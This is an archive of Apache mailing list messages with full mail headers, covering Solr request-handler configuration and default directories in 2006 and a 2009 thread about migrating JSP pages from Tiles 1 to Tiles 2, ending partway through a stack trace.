(161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 30 Mar 2006 13:07:28 -0800 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO zproxy.gmail.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 30 Mar 2006 13:07:28 -0800 Received: by zproxy.gmail.com with SMTP id 13so518347nzn for <[email protected]>; Thu, 30 Mar 2006 13:07:07 -0800 (PST) DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references; b=Fuywln/5opS7nE1XfFbWZyYbQ58v9TlohiaKd5yB/K3kyC7ILai2C25V2r+SDhhKxc9vaX97WHJnQ8NXK2KNJWDJnzG0BPsiCGfGbrPwxlSg5VsIX/tIurjn/+v0xK+vEoIZRZRMWwnRsX/CI/3R/gvjz5TGNpL21P+gavtDr6U= Received: by 161.129.204.104 with SMTP id d9mr468664pym; Thu, 30 Mar 2006 13:07:07 -0800 (PST) Received: by 161.129.204.104 with HTTP; Thu, 30 Mar 2006 13:07:07 -0800 (PST) Message-ID: <[email protected]> Date: Thu, 30 Mar 2006 16:07:07 -0500 From: "Yonik Seeley" <[email protected]> To: [email protected] Subject: Re: faceted browsing In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable Content-Disposition: inline References: <[email protected]> <[email protected]> <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N On 3/30/06, Erik Hatcher <[email protected]> wrote: > Now I need to investigate the flexibility of the solrconfig.xml - can > custom parameters be set there, such that a custom SolrRequestHandler > could read them? For example, I'd want to list the field names that > are the "facets", such that counts for each of those are returned > with each query. Yes, here is a fragment from the example solrconfig.xml <!-- example of a request handler with custom parameters passed to it's i= nit() <requestHandler name=3D"example" class=3D"myorg.mypkg.MyRequestHandler" > <int name=3D"myparam">1000</int> <float name=3D"ratio">1.4142135</float> <arr name=3D"myarr"><int>1</int><int>2</int></arr> <str>foo</str> </requestHandler> --> The XML format is the same as what is used in the response for general data= . In addition to the data types above, there is also <lst> which is the same as <arr> except that the elements are named. -Yonik From [email protected] Fri Mar 31 18:47:42 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 93590 invoked from network); 31 Mar 2006 18:47:05 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 31 Mar 2006 18:47:05 -0000 Received: (qmail 36118 invoked by uid 500); 31 Mar 2006 18:47:01 -0000 Delivered-To: [email protected] Received: (qmail 36099 invoked by uid 500); 31 Mar 2006 18:47:01 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <solr-user.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 36090 invoked by uid 99); 31 Mar 2006 18:47:01 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 31 Mar 2006 10:47:01 -0800 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO zproxy.gmail.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 31 Mar 2006 10:47:00 -0800 Received: by zproxy.gmail.com with SMTP id 13so871428nzn for <[email protected]>; Fri, 31 Mar 2006 10:46:39 -0800 (PST) DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; h=received:message-id:date:from:to:subject:mime-version:content-type:content-transfer-encoding:content-disposition; b=DJP3rLnp7QLuxonsxgGrb2QwU2kFqzGwt6NekX1q9WtcMNfqasQRNCkc6WfoVL6aNOui/7PpidhzIUcuuEhNWuoAz7EzP6CGozcBdT/d8XQotBPCSluvaP6Sqaru61SEq/h61oqUkgcj+QsjWI2kybn2J87Vh3hmUueiKsE8uFA= Received: by 161.129.204.104 with SMTP id g20mr572334pyk; Fri, 31 Mar 2006 10:46:39 -0800 (PST) Received: by 161.129.204.104 with HTTP; Fri, 31 Mar 2006 10:46:39 -0800 (PST) Message-ID: <[email protected]> Date: Fri, 31 Mar 2006 13:46:39 -0500 From: "Yonik Seeley" <[email protected]> To: [email protected] Subject: change of default directories MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable Content-Disposition: inline X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N FYI, the next nightly build (4/01) will change where Solr looks for config and stores data. By default, config will be found in ./solr/conf and data will be in ./solr/= data This base solr directory may be changed by setting the system property solr.solr.home (the default is ./solr/) -Yonik
From [email protected] Mon Jul 06 05:01:18 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 68173 invoked from network); 6 Jul 2009 05:01:18 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 6 Jul 2009 05:01:18 -0000 Received: (qmail 65475 invoked by uid 500); 6 Jul 2009 05:01:28 -0000 Delivered-To: [email protected] Received: (qmail 65394 invoked by uid 500); 6 Jul 2009 05:01:28 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <users.tiles.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 65384 invoked by uid 99); 6 Jul 2009 05:01:27 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 06 Jul 2009 05:01:27 +0000 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_HELO_PASS,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO kuber.nabble.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 06 Jul 2009 05:01:17 +0000 Received: from isper.nabble.com ([161.129.204.104]) by kuber.nabble.com with esmtp (Exim 4.63) (envelope-from <[email protected]>) id 1MNgJz-00010w-Vg for [email protected]; Sun, 05 Jul 2009 22:00:55 -0700 Message-ID: <[email protected]> Date: Sun, 5 Jul 2009 22:00:55 -0700 (PDT) From: Roshni Basu <[email protected]> To: [email protected] Subject: Issues while reusing the old tags- Please help MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-Nabble-From: [email protected] X-Virus-Checked: Checked by ClamAV on apache.org Hi, I am migrating from Tiles1 to Tiles2. I'm using tiles-compat.jar inorder to reuse the Tiles1 definition. I have removed the tiles plugin from struts-config.xml. Here is the snippet from web.xml <servlet-name>tiles</servlet-name> <servlet-class>org.apache.tiles.web.startup.TilesServlet</servlet-class> <init-param> <param-name> org.apache.tiles.impl.BasicTilesContainer.DEFINITIONS_CONFIG</param-name> <param-value>/WEB-INF/config/layout/tile2-console-default-definition.xml,/WEB-INF/config/tile2-IMSConsole-defs.xml,/WEB-INF/config/tile1-definition.xml,/WEB-INF/config/tile2-defs.xml</param-value> </init-param> <init-param> <param-name>org.apache.tiles.definition.DefinitionsReader</param-name> <param-value>org.apache.tiles.compat.definition.digester.CompatibilityDigesterDefinitionsReader</param-value> </init-param> <init-param> <param-name>org.apache.tiles.renderer.impl.BasicRendererFactory.TYPE_RENDERERS</param-name> <param-value> string,org.apache.tiles.renderer.impl.StringAttributeRenderer; definition,org.apache.tiles.renderer.impl.DefinitionAttributeRenderer; template,org.apache.tiles.renderer.impl.TemplateAttributeRenderer; page,org.apache.tiles.renderer.impl.TemplateAttributeRenderer </param-value> </init-param> <load-on-startup>2</load-on-startup> </servlet> I get the following exception in the jsp: javax.servlet.jsp.JspException: Can't get definitions factory from context. at org.apache.struts.tiles.taglib.InsertTag.processDefinitionName(InsertTag.java:632) at org.apache.struts.tiles.taglib.InsertTag.createTagHandler(InsertTag.java:529) at org.apache.struts.tiles.taglib.InsertTag.doStartTag(InsertTag.java:479) at org.apache.jsp.view.Index_jsp._jspx_meth_tiles_insert_0(Index_jsp.java:113) at org.apache.jsp.view.Index_jsp._jspService(Index_jsp.java:90) at org.apache.jasper.runtime.HttpJspBase.service(HttpJspBase.java:97) at javax.servlet.http.HttpServlet.service(HttpServlet.java:802) at org.apache.jasper.servlet.JspServletWrapper.service(JspServletWrapper.java:332) at org.apache.jasper.servlet.JspServlet.serviceJspFile(JspServlet.java:314) at org.apache.jasper.servlet.JspServlet.service(JspServlet.java:264) at javax.servlet.http.HttpServlet.service(HttpServlet.java:802) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:252) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:173) at com.rsa.ui.common.filter.GZIPFilter.doFilterInternal(GZIPFilter.java:55) at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:76) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:202) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:173) at com.rsa.ui.common.security.csrf.CSRFFilter.doFilterInternal(CSRFFilter.java:85) at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:76) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:202) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:173) at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:213) at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:178) at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:126) at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:105) at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:107) at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:148) at org.apache.coyote.http11.Http11Processor.process(Http11Processor.java:869) at org.apache.coyote.http11.Http11BaseProtocol$Http11ConnectionHandler.processConnection(Http11BaseProtocol.java:664) at org.apache.tomcat.util.net.PoolTcpEndpoint.processSocket(PoolTcpEndpoint.java:527) at org.apache.tomcat.util.net.LeaderFollowerWorkerThread.runIt(LeaderFollowerWorkerThread.java:80) at org.apache.tomcat.util.threads.ThreadPool$ControlRunnable.run(ThreadPool.java:684) at java.lang.Thread.run(Thread.java:595) How do I exactly solve this? -- View this message in context: http://www.nabble.com/Issues-while-reusing-the-old-tags--Please-help-tp24349833p24349833.html Sent from the tiles users mailing list [email protected]. From [email protected] Mon Jul 06 07:25:16 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 24079 invoked from network); 6 Jul 2009 07:25:16 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 6 Jul 2009 07:25:16 -0000 Received: (qmail 35101 invoked by uid 500); 6 Jul 2009 07:25:26 -0000 Delivered-To: [email protected] Received: (qmail 35017 invoked by uid 500); 6 Jul 2009 07:25:26 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <users.tiles.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 35007 invoked by uid 99); 6 Jul 2009 07:25:26 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 06 Jul 2009 07:25:26 +0000 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail-bw0-f211.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 06 Jul 2009 07:25:17 +0000 Received: by bwz7 with SMTP id 7so912468bwz.8 for <[email protected]>; Mon, 06 Jul 2009 00:24:56 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:in-reply-to:references :date:message-id:subject:from:to:content-type :content-transfer-encoding; bh=oTZTkQxsgHslAO6joarGB77LPALRSXbEGrF0gBSmSgo=; b=hhnQnq1+YL8hDZU/fvVV71TnHOfzMBtI+2WwLcIB6wPBold65jbf5JJ4cHT5lQY3TS TBd3hSODgr60ausB2XlU+9V5gXfbYbMm6w3dATA2LbOAMWMo1o8GDtIor5LEY2+/gENf rOQIJB9CZfR1ALl8YGWJnYmwmkyjnvoG/EYRI= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:in-reply-to:references:date:message-id:subject:from:to :content-type:content-transfer-encoding; b=sB4G5IZYCUwJ/jZ+e+OZjiZP8cWiC4BVP1hF1EFPCMI5Dli16FStXG5dEhbEruemqs IkHVWr+x89MTESDELY+pjOq9LyXSbQIrq+7dBuoWKhHxrLC+OaKDRhVdEcH0+QcqoEJV fVs3rqSudyapN9ntXcxCd+wPpsiuma4Qpb2CI= MIME-Version: 1.0 Received: by 161.129.204.104 with SMTP id v15mr1734390fao.15.1246865096336; Mon, 06 Jul 2009 00:24:56 -0700 (PDT) In-Reply-To: <[email protected]> References: <[email protected]> Date: Mon, 6 Jul 2009 09:24:56 +0200 Message-ID: <[email protected]> Subject: Re: Issues while reusing the old tags- Please help From: Antonio Petrelli <[email protected]> To: [email protected] Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable X-Virus-Checked: Checked by ClamAV on apache.org 2009/7/6 Roshni Basu <[email protected]>: > javax.servlet.jsp.JspException: Can't get definitions factory from contex= t. > =A0 =A0 =A0 at > org.apache.struts.tiles.taglib.InsertTag.processDefinitionName(InsertTag.= java:632) It seems that you are using the old version of JSP tags. See: http://tiles.apache.org/framework/migration/tags.html Antonio From [email protected] Mon Jul 06 07:41:10 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 26297 invoked from network); 6 Jul 2009 07:41:10 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 6 Jul 2009 07:41:10 -0000 Received: (qmail 44388 invoked by uid 500); 6 Jul 2009 07:41:20 -0000 Delivered-To: [email protected] Received: (qmail 44322 invoked by uid 500); 6 Jul 2009 07:41:20 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <users.tiles.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 44312 invoked by uid 99); 6 Jul 2009 07:41:20 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 06 Jul 2009 07:41:20 +0000 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_HELO_PASS,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO kuber.nabble.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 06 Jul 2009 07:41:10 +0000 Received: from isper.nabble.com ([161.129.204.104]) by kuber.nabble.com with esmtp (Exim 4.63) (envelope-from <[email protected]>) id 1MNiok-0006t5-0M for [email protected]; Mon, 06 Jul 2009 00:40:50 -0700 Message-ID: <[email protected]> Date: Mon, 6 Jul 2009 00:40:50 -0700 (PDT) From: Roshni Basu <[email protected]> To: [email protected] Subject: Re: Issues while reusing the old tags- Please help In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: quoted-printable X-Nabble-From: [email protected] References: <[email protected]> <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Does it mean that using tiles-compat.jar we can only use the old definitio= ns i.e the xml files (tiles-compat.jar in my case)and we are supposed to chang= e the jsp's with the tiles2 tags? Cannot we use the tiles1 tags in jsps? Antonio Petrelli-3 wrote: >=20 > 2009/7/6 Roshni Basu <[email protected]>: >> javax.servlet.jsp.JspException: Can't get definitions factory from >> context. >> =C2=A0 =C2=A0 =C2=A0 at >> org.apache.struts.tiles.taglib.InsertTag.processDefinitionName(InsertTag= .java:632) >=20 > It seems that you are using the old version of JSP tags. See: > http://tiles.apache.org/framework/migration/tags.html >=20 > Antonio >=20 >=20 --=20 View this message in context: http://www.nabble.com/Issues-while-reusing-th= e-old-tags--Please-help-tp24349833p24351036.html Sent from the tiles users mailing list [email protected]. From [email protected] Mon Jul 06 07:49:20 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 27658 invoked from network); 6 Jul 2009 07:49:20 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 6 Jul 2009 07:49:20 -0000 Received: (qmail 47645 invoked by uid 500); 6 Jul 2009 07:49:30 -0000 Delivered-To: [email protected] Received: (qmail 47592 invoked by uid 500); 6 Jul 2009 07:49:30 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <users.tiles.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 47582 invoked by uid 99); 6 Jul 2009 07:49:30 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 06 Jul 2009 07:49:30 +0000 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail-fx0-f222.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 06 Jul 2009 07:49:21 +0000 Received: by fxm22 with SMTP id 22so4297652fxm.8 for <[email protected]>; Mon, 06 Jul 2009 00:49:01 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:in-reply-to:references :date:message-id:subject:from:to:content-type :content-transfer-encoding; bh=JM/vDtyGOF2V3uCDFGDCtOUxGvxIv6RyKxPGCREkpd8=; b=qsXTpZGBcnb9jPYZi8kYektgdYR0rCcaoAO7Q6/I8ARHYUm2nu47g8DlU1t95QoiXC SdPwzAl1O9vezF8aDYSwL7tysACSLG2O9/wOvH36Y/F5q/Nvs6uxd7XvIjUBLzc42RUt Fxlsqnho6L2ZpuQT0XlxA6Vx5G3/dBzbuIClE= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:in-reply-to:references:date:message-id:subject:from:to :content-type:content-transfer-encoding; b=fR7Xo7f0CbCEiUEMAqfiiMPAgCkXC+gbvocJQpkoAy5fBt2IXE97llZUPG/nMRSR29 E6GY/RHdH12hYyRkGfMfSbRFntKygHmPZQfLhm8rhJdA9PPVtiGUQ6drua9JOOH5FAi1 VaVRMjn3fYvY5BQbCeKR5OoGMsH9JCyDl7/Ic= MIME-Version: 1.0 Received: by 161.129.204.104 with SMTP id r16mr1746784fao.24.1246866540955; Mon, 06 Jul 2009 00:49:00 -0700 (PDT) In-Reply-To: <[email protected]> References: <[email protected]> <[email protected]> <[email protected]> Date: Mon, 6 Jul 2009 09:49:00 +0200 Message-ID: <[email protected]> Subject: Re: Issues while reusing the old tags- Please help From: Antonio Petrelli <[email protected]> To: [email protected] Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable X-Virus-Checked: Checked by ClamAV on apache.org 2009/7/6 Roshni Basu <[email protected]>: > > =A0Does it mean that using tiles-compat.jar we can only use the old defin= itions > i.e the xml files (tiles-compat.jar in my case)and we are supposed to cha= nge > the jsp's with the tiles2 tags? Cannot we =A0use the tiles1 tags in jsps? Nope. This was a hard choice at the time of development. I was going to create a tag layer that would be compatible with Tiles 1, but, in fact, I would have to write *deliberately* bad code. So you have to migrate at least the JSP part. It is not hard to do, the page that I sent you should be enough. Antonio From [email protected] Mon Jul 06 07:50:00 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 27711 invoked from network); 6 Jul 2009 07:50:00 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 6 Jul 2009 07:50:00 -0000 Received: (qmail 47842 invoked by uid 500); 6 Jul 2009 07:50:10 -0000 Delivered-To: [email protected] Received: (qmail 47771 invoked by uid 500); 6 Jul 2009 07:50:10 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <users.tiles.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 47761 invoked by uid 99); 6 Jul 2009 07:50:10 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 06 Jul 2009 07:50:10 +0000 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail-bw0-f211.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 06 Jul 2009 07:50:01 +0000 Received: by bwz7 with SMTP id 7so930462bwz.8 for <[email protected]>; Mon, 06 Jul 2009 00:49:40 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:in-reply-to:references :date:message-id:subject:from:to:content-type :content-transfer-encoding; bh=wMwdj1URScfNpxWxYs9DTkra5WTqSHOMqpWFwlfVTGI=; b=n9J64pyXAiqU0uXa1ZUnEEfQw3hFyLMqVaS3krFMvpVKbJrCz5U1xNeT2X9E8c/CT0 yTSWNB7wnfp9RRDx7mO3Sl2GzArg73IXY1CFrvHokgXGqEZ34IAdDtm/6vdGuruhZBrA FglLXHVAIiy4KIHjc1NXG96W5xKWKn9+kiKs4= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:in-reply-to:references:date:message-id:subject:from:to :content-type:content-transfer-encoding; b=BKF/Ezop4Muym/CvwGYmfSIdznVezg98E/3+6W2rObNrtadZqwVxYDgXIhB0DssVzl lzo1nfR2FTMCCtce/e94GBuTl9ME55ozA2nN5plvMi1HOwowFJbmH1r9Wn9OdJtspnIf RrEhtVPXOdKz5LYHCxdk94mLXdFTGsFaEQ7Vo= MIME-Version: 1.0 Received: by 161.129.204.104 with SMTP id s8mr1791102fao.9.1246866580489; Mon, 06 Jul 2009 00:49:40 -0700 (PDT) In-Reply-To: <[email protected]> References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> Date: Mon, 6 Jul 2009 09:49:40 +0200 Message-ID: <[email protected]> Subject: Re: Issues while reusing the old tags- Please help From: Antonio Petrelli <[email protected]> To: [email protected] Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable X-Virus-Checked: Checked by ClamAV on apache.org 2009/7/6 Antonio Petrelli <[email protected]>: > 2009/7/6 Roshni Basu <[email protected]>: >> >> =A0Does it mean that using tiles-compat.jar we can only use the old defi= nitions >> i.e the xml files (tiles-compat.jar in my case)and we are supposed to ch= ange >> the jsp's with the tiles2 tags? Cannot we =A0use the tiles1 tags in jsps= ? > > Nope. I meant: you can use old XML files, but not old JSP tags. Antonio From [email protected] Mon Jul 06 08:21:56 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 38387 invoked from network); 6 Jul 2009 08:21:56 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 6 Jul 2009 08:21:56 -0000 Received: (qmail 75035 invoked by uid 500); 6 Jul 2009 08:22:06 -0000 Delivered-To: [email protected] Received: (qmail 74971 invoked by uid 500); 6 Jul 2009 08:22:06 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <users.tiles.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 74961 invoked by uid 99); 6 Jul 2009 08:22:06 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 06 Jul 2009 08:22:06 +0000 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_HELO_PASS,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO kuber.nabble.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 06 Jul 2009 08:21:57 +0000 Received: from isper.nabble.com ([161.129.204.104]) by kuber.nabble.com with esmtp (Exim 4.63) (envelope-from <[email protected]>) id 1MNjSC-00008h-Lw for [email protected]; Mon, 06 Jul 2009 01:21:36 -0700 Message-ID: <[email protected]> Date: Mon, 6 Jul 2009 01:21:36 -0700 (PDT) From: Roshni Basu <[email protected]> To: [email protected] Subject: Re: Issues while reusing the old tags- Please help In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: quoted-printable X-Nabble-From: [email protected] References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Thanks Antonio. Yeah jsp change is easy. But I was thinking that I could use the old tags as well.:) Antonio Petrelli-3 wrote: >=20 > 2009/7/6 Roshni Basu <[email protected]>: >> >> =C2=A0Does it mean that using tiles-compat.jar we can only use the old >> definitions >> i.e the xml files (tiles-compat.jar in my case)and we are supposed to >> change >> the jsp's with the tiles2 tags? Cannot we =C2=A0use the tiles1 tags in j= sps? >=20 > Nope. This was a hard choice at the time of development. I was going > to create a tag layer that would be compatible with Tiles 1, but, in > fact, I would have to write *deliberately* bad code. > So you have to migrate at least the JSP part. It is not hard to do, > the page that I sent you should be enough. >=20 > Antonio >=20 >=20 --=20 View this message in context: http://www.nabble.com/Issues-while-reusing-th= e-old-tags--Please-help-tp24349833p24351492.html Sent from the tiles users mailing list [email protected]. From [email protected] Mon Jul 06 10:51:21 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 94278 invoked from network); 6 Jul 2009 10:51:21 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 6 Jul 2009 10:51:21 -0000 Received: (qmail 23414 invoked by uid 500); 6 Jul 2009 10:51:31 -0000 Delivered-To: [email protected] Received: (qmail 23346 invoked by uid 500); 6 Jul 2009 10:51:30 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <users.tiles.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 23336 invoked by uid 99); 6 Jul 2009 10:51:30 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 06 Jul 2009 10:51:30 +0000 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_HELO_PASS,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO kuber.nabble.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 06 Jul 2009 10:51:21 +0000 Received: from isper.nabble.com ([161.129.204.104]) by kuber.nabble.com with esmtp (Exim 4.63) (envelope-from <[email protected]>) id 1MNlmn-0005oS-5I for [email protected]; Mon, 06 Jul 2009 03:51:01 -0700 Message-ID: <[email protected]> Date: Mon, 6 Jul 2009 03:51:01 -0700 (PDT) From: Roshni Basu <[email protected]> To: [email protected] Subject: Issue with putAttribute tag MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-Nabble-From: [email protected] X-Virus-Checked: Checked by ClamAV on apache.org I have a jsp, Template1.jsp in which I'm trying to use the new tiles2 tag for the following pice of code, <tiles:put name="formButtonsTop" beanName="formButtonsTop" beanScope="tile"/> The modified piece of code is <tiles:putAttribute name="formButtonsTop" value="${formButtonsTop}"/> I am getting the following exception: Error importing attributes. Attribute 'formButtonsTop' has a null [email protected](PageContextImpl.java:858) at org.apache.jasper.runtime.PageContextImpl.handlePageException(PageContextImpl.java:791) at org.apache.jsp.framework.templates.MasterBody2_jsp._jspService(MasterBody2_jsp.java:212) at 